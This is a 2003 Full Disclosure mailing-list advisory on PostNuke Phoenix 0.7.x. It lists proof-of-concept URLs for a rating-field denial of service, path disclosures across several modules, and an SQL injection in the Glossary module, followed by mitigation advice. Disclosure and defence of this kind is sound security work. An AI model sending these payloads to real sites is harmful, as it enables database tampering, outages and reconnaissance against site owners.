Full Disclosure mailing list archives
PostNuke Main Modules SQL Injections , DoS and Path Disclosures
From: "Lorenzo Hernandez Garcia-Hierro" <novappc () novappc com>
Date: Mon, 9 Jun 2003 21:07:56 +0200
------ Product: PostNuke Vendor: PostNuke WWW.POSTNUKE.COM Versions Vulnerable: PostNuke Phoenix 0.7.x.x Phoenix 0.7.2.3 with patches ( in all versions ) Phoenix 0.7.2.3 without patches (in all versions ) 0.7.2.1 (All prior versions of 0.7.2.3 with/without patches) No vulnerable: ? Advisory: NSRG-09-8 ------ DESCRIPTION: ------ Researching with my last advisory about PHP-Nuke i found in PostNuke the same DoS potential attack and buffer overflow in rating related systems like Web Links, Downloads and all the main modules! .I found path disclosures and some SQL Injections. Main modules of phpNuke based portals again affected by security holes... -------- FOUND VULNERABLE MODULES: -------- *********** *DOWNLOADS* *********** DoS attack in rating system and path disclosures at all id and related fields: ---- Dos Attack ---- The rating system can be used for make a several DoS attack to database server and webserver . The problem is in the validation of the vote , you can vote with all characters that you choose! - Proof of Concept - http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=addrati ng&ratinglid=[DOWNLOAD ID]&ratinguser=[REMOTE USER]&ratinghost_name=[REMOTE HOST ;-)]&rating=[YOUR RANDOM CONTENT] The [ RANDOM CONTENT ] can be a hundred thousand of 9 or similar ( all what do you want to send ). This generates a new rating value of : 2,147,483,647.00 or the generated random error number by mysql server. ---- Path Disclosure ---- I encountered some path disclosures in PostNuke at Downloads and WebLinks modules , you get this path disclosure format: Fatal error: Call to a member function on a non-object in [LOCAL PATH TO POSTNUKE INSTALATION]/modules/Downloads/[php vulnerable file] on line xxx - Proof of Concept - http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdow nloaddetails&lid=[RANDOM NUMERIC CONTENT] http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdow nloadcomments&lid=[RANDOM NUMERIC CONTENT] http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=viewdow nloadeditorial&lid=[RANDOM NUMERIC CONTENT] http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=brokend ownload&lid=[RANDOM NUMERIC CONTENT] http://[TARGET]/modules.php?op=modload&name=Downloads&file=index&req=outside downloadsetup&lid=[RANDOM NUMERIC CONTENT] *********** *WEB_LINKS* *********** The same with Downloads module and the same path disclosures with DoS potential attack. The Exploitable urls of the Downloads Vulnerabilities Proof of Concept must be changed into Web_Links variables for use. Web Links module is based on Downloads module totally... *********** *SECTIONS * *********** Path disclosures, you get with the Proof of Concept: Fatal error: Call to a member function on a non-object in [LOCAL PATH TO POSTNUKE INSTALLATION]/modules/Sections/[FILE] on line xxx - Proof of Concept - http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=listarti cles&secid=[BLANK] http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=listarti cles&secid=[RANDOM CONTENT] http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=viewarti cle&artid=[BLANK] http://[TARGET]/modules.php?op=modload&name=Sections&file=index&req=viewarti cle&artid=[RANDOM CONTENT] *********** * FAQ * *********** Path disclosures related to id a fileds and FAQ's. You get error flag: Fatal error: Cannot redeclare head() (previously declared in /darwing/web/htdocs/beta.linex.org/header.php:44) in /darwing/web/htdocs/beta.linex.org/header.php on line 44 - Proof of Concept - http://[TARGET]/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat= `[RANDOM CHARACTERS] *********** * SEARCH * - ({ Not totally tested }) - *********** Path disclosure with a phpBB integration , you get searching ` a Fatal error: Call to a member function on a non-object in [REAL PATH] on line XxX - Proof of Concept - eXperimental: Put in search field ` and click in submit button. walla! . *********** * REVIEWS * *********** Path disclosures: Fatal error: Call to a member function on a non-object in /home/path to ..... on line XxX - Proof of Concept - http://[TARGET]/modules.php?op=modload&name=Reviews&file=index&req=showconte nt&id=`[RANDOM] *********** * GLOSSARY* *********** Path disclosures and SQL INJECTION: Warning: Supplied argument is not a valid MySQL result resource in [REAL PATH TO SCRIPT] on line XxX - Proof of Concept - http://[TARGET]/modules.php?op=modload&name=Glossary&file=index&page=`[HERE COMES YOUR RANDOM DATA OR SQL QUERY] NOTE: The SQL QInjection doesn't run in all systems. ------------------------ | FINAL NOTES | ------------------------ - The Search module vulnerability is an experimental vulnerability , i don't found more than one sites that run the combination of phpBB 1.4 and Phoenix 0.7.x.x . - The error flags of php must be configured to show the flags for view the queries results and path disclosures , default this is on and you can view all. ------------------------ | SOLUTION | ------------------------ - Configure error flags in your php.ini for hide the errors and warnings , this protects you from path disclosures. - Deactivate completly affected modules if you can't change php.ini . - Use another php portal system . (Typical paranoic/stupid solution ;-) ------------------------ | CONTACT | ------------------------ Lorenzo Manuel Hernandez Garcia-Hierro --- Computer Security Analyzer --- --www.novappc.com -- PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7 ********************************** _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- PostNuke Main Modules SQL Injections , DoS and Path Disclosures Lorenzo Hernandez Garcia-Hierro (Jun 09)